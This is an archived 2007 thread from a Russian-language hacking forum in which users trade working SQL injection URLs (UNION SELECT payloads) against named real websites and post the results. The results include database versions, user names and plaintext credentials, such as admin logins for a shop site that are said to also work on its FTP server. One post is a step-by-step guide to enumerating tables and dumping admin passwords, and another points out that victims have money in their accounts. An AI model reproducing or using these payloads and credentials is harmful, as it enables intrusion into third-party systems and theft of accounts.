ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.12.2007, 00:27
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576
Репутация:
100
|
|
Код:
http://marcanderson.com.au/product_list.php?pg=1&id=-18'+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,user(),database(),25/*
5.0.26-standard-log
marc_and@localhost
marcanderson_com_au |
|
|
18.12.2007, 00:35
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
Мож кому-то и пригодится...  хотя как по мне,я этого не понимаю воoбще ,для чего все это нужно ? 
StripShop.ru
код:
http://stripshop.ru/cat.php?id=-500+union+select+concat(uname,0x3a,pass)+from+stri p_users+limit+0,1/*
5 мускул
p.s у некоторых юзеров довольно приличные суммы на счету |
|
|
|
18.12.2007, 02:02
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
linspire.com
http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-213+union+select+1,2/*
4.0.27-standard-log::::linspire@10.0.0.20 |
|
|
|
18.12.2007, 02:18
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576
Репутация:
100
|
|
www.patio.com
Код:
http://patio.com/catalog.php?id=-82+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
5.0.27_pat9663@localhost_patio_com
Код:
http://patio.com/catalog.php?id=-82+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables/*
....таблицы>колонки
А вот дальше никак....( "Table 'patio_com.admin' doesn't exist" "SELECT command denied to user 'pat9663'@'localhost' for table 'admin'"
|
|
|
|
18.12.2007, 10:38
|
|
Новичок
Регистрация: 06.12.2007
Сообщений: 11
Провел на форуме:
120052
Репутация:
30
|
|
Код:
http://www.ethology.ru/library/?id=-1+union+select+1,2,3,4,5,login,passwd,8+from+ethology_users+limit+2,1/*
Логины и пароли к закрытому форуму!!! |
|
|
|
4.1.22:wwwmksksrumksks@localhost |
18.12.2007, 11:41
|
|
Новичок
Регистрация: 31.10.2007
Сообщений: 18
Провел на форуме:
165018
Репутация:
25
|
|
4.1.22:wwwmksksrumksks@localhost
http://www.mks-ks.ru/shop/cat.php?id=-1+union+select+1,2,3,concat(0x3a,version(),databas e(),user())/*
Последний раз редактировалось JIyka; 18.12.2007 в 11:43..
|
|
|
|
18.12.2007, 11:46
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
fedor.bel.ru
Официальный сайт Федора Емельяненко
(кто не знает, он 4-х кратный чемпион мира по самбо)
Код:
http://fedor.bel.ru/?id=-147+UNION+SELECT+1,concat(login,0x3a,password),3,4,5,6,7,8,9+from+users+limit+0,3/*
5.1.19-beta-log
логин: joerg32
пароль: joerg321
Там есть магазин, как раз к нему пароль и подошел... ;-)
Последний раз редактировалось Iceangel_; 18.12.2007 в 11:48..
|
|
|
|
18.12.2007, 16:31
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
Для 5taY3r
Ищешь табы:
Код:
http://patio.com/catalog.php?id=-82+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+17,1/*
Например, находишь табу tbladminusers
Смотришь в ней поля:
Код:
http://patio.com/catalog.php?id=-82+union+select+1,2,3,4,5,column_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns+where+table_name=0x74626C61646D696E7573657273+limit+1,1/*
Видим поля userID и patiopassword
Смотрим кто там:
Код:
http://patio.com/catalog.php?id=-82+union+select+1,2,3,4,5,concat_ws(0x3a,userID,patiopassword),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+tbladminusers+limit+0,1/*
Сидит там [ логин : пасс ]:
Код:
patioadmin:furniture
Этот для смеха тут сидит, а этот АДМИН!!!
И всего-то делов!
В дополнение можно раскопать, что логин и пасс админа подходят к ftp.patio.com ...
Ну а с этим можно и поиграться! 
Последний раз редактировалось fRg; 18.12.2007 в 17:38..
|
|
|
|
18.12.2007, 19:16
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
Код:
http://www.xoxox.ru/news.php?id=-96+union+select+1,2,version(),4,5,6,concat_ws(0x2F,brand_id,name),8+from+brands/*
Version 5.0.45-log |
|
|
|
18.12.2007, 19:20
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
rfbd.ru
Код HTML:
http://www.rfbd.ru/cat.php?rubrika=1+union+select+0,VERSION(),USER(),3,DATABASE(),5,6,7,8,9,10,11,12,13/*
USER:a1rfbd_guest@localhost
VERSION:5.0.37-standard-log
DATABASE:a1rfbd_ric_datebase
Вывод названий всех таблиц (information_schema.tables) -
Код HTML:
http://www.rfbd.ru/cat.php?rubrika=1+union+select+0,concat(USER(),VERSION(),DATABASE()),concat(Table_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables/*
Вывод названий всех колон (information_schema.columns) -
Код HTML:
http://www.rfbd.ru/cat.php?rubrika=1+union+select+0,concat(USER(),VERSION(),DATABASE()),concat(Column_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns/*
Это не баян и раскрутил всё что смог, а плюсеГ так и не пиставили, обидно.
Последний раз редактировалось trumps; 19.12.2007 в 19:59..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?532523){kind=avatar}
Линейный вид
